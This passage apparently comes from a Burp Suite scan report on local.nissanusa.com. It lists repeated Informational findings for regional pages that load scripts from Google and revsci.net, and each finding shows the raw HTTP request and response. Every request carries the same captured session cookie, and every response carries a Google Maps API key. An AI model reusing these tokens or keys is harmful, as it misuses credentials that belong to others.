Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=40201; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Set-Cookie: localDMA=louisville-area; expires=Sat, 05-Feb-2011 04:52:17 GMT; path=/
Content-Length: 118285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.234. http://local.nissanusa.com/miami-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /miami-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /miami-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=33101; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Set-Cookie: localDMA=miami-area; expires=Sat, 05-Feb-2011 04:55:28 GMT; path=/
Content-Length: 116534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.235. http://local.nissanusa.com/milwaukee-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /milwaukee-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /milwaukee-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=53201; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Set-Cookie: localDMA=milwaukee-area; expires=Sat, 05-Feb-2011 04:52:09 GMT; path=/
Content-Length: 138619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.236. http://local.nissanusa.com/minneapolis-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /minneapolis-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /minneapolis-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=55401; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
Set-Cookie: localDMA=minneapolis-area; expires=Sat, 05-Feb-2011 04:52:05 GMT; path=/
Content-Length: 109350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.237. http://local.nissanusa.com/nashville-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /nashville-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nashville-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=37201; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Set-Cookie: localDMA=nashville-area; expires=Sat, 05-Feb-2011 04:56:10 GMT; path=/
Content-Length: 119690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.238. http://local.nissanusa.com/new-orleans-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /new-orleans-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /new-orleans-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=70112; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
Set-Cookie: localDMA=new-orleans-area; expires=Sat, 05-Feb-2011 04:53:37 GMT; path=/
Content-Length: 114343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.239. http://local.nissanusa.com/new-york-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /new-york-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /new-york-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=10001; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Set-Cookie: localDMA=new-york-area; expires=Sat, 05-Feb-2011 04:52:19 GMT; path=/
Content-Length: 217093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.240. http://local.nissanusa.com/norfolk-portsmouth-newport-news-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /norfolk-portsmouth-newport-news-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /norfolk-portsmouth-newport-news-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=23501; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
Set-Cookie: localDMA=norfolk-portsmouth-newport-news-area; expires=Sat, 05-Feb-2011 04:56:07 GMT; path=/
Content-Length: 115633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.241. http://local.nissanusa.com/oklahoma-city-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /oklahoma-city-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /oklahoma-city-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=73101; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
Set-Cookie: localDMA=oklahoma-city-area; expires=Sat, 05-Feb-2011 04:54:39 GMT; path=/
Content-Length: 107751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.242. http://local.nissanusa.com/orlando-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /orlando-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /orlando-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=32801; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Set-Cookie: localDMA=orlando-area; expires=Sat, 05-Feb-2011 04:55:27 GMT; path=/
Content-Length: 131647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.243. http://local.nissanusa.com/philadelphia-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /philadelphia-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /philadelphia-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=19101; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
Set-Cookie: localDMA=philadelphia-area; expires=Sat, 05-Feb-2011 04:52:32 GMT; path=/
Content-Length: 205265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.244. http://local.nissanusa.com/phoenix-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /phoenix-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /phoenix-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:56:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:56:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=85001; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
Set-Cookie: localDMA=phoenix-area; expires=Sat, 05-Feb-2011 04:56:47 GMT; path=/
Content-Length: 116937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.245. http://local.nissanusa.com/pittsburgh-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /pittsburgh-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pittsburgh-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=15201; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
Set-Cookie: localDMA=pittsburgh-area; expires=Sat, 05-Feb-2011 04:51:59 GMT; path=/
Content-Length: 118838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.246. http://local.nissanusa.com/portland-or-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /portland-or-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /portland-or-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=97201; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
Set-Cookie: localDMA=portland-or-area; expires=Sat, 05-Feb-2011 04:57:39 GMT; path=/
Content-Length: 117033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.247. http://local.nissanusa.com/providence-new-bedford-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /providence-new-bedford-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /providence-new-bedford-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
